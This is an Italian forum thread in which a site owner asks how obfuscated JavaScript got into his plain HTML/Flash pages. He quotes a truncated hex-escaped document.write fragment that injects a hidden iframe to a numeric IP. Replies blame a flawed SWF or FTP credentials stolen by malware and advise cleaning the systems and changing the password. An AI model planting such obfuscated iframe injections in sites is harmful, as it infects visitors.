codice maligno in una pagina html

[crisdb971]

Ciao a tutti,
in un sito che ho realizzato parecchio tempo fa ho verificato che hanno inserito del codice maligno:

<script language='JavaScript'>document.write(unescape('\x3 C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\ x68\ ...

che tradotto (in parte) da esadecimale a relativo valore asci:

<iframe src="http://79. ...

inserisce un iframe.

La mia domanda è questa: come hanno fatto ad inserirlo visto che il sito è reAlizzato solamente in HTML e FLASH senza utilizzare servizi di scripting e form?
Il provider è uno dei più grossi che ci siano quindi dubito che si tratti di server bucati.

che ci sia un "buco" nei file SWF?????

[Habanero]

Originariamente inviato da crisdb971
che ci sia un "buco" nei file SWF?????

E' una delle possibilità.

Un'altra è che tu abbia effettuato l'upload via FTP da un sistema infetto e che il malware ti abbia rubato le credenziali di accesso inviandole a chi ti ha modificato le pagine.

Verifica che i tuoi sistemi siano puliti e cambia la password di accesso al server FTP.

[edgar bangkok]

Comunque il fatto che siano decine i siti colpiti sul medesimo IP lascia dubbi anche sul fatto chr si tratti di problemi sul server
Saluti da Bangkok

Edgar
http://edetools.blogspot.com/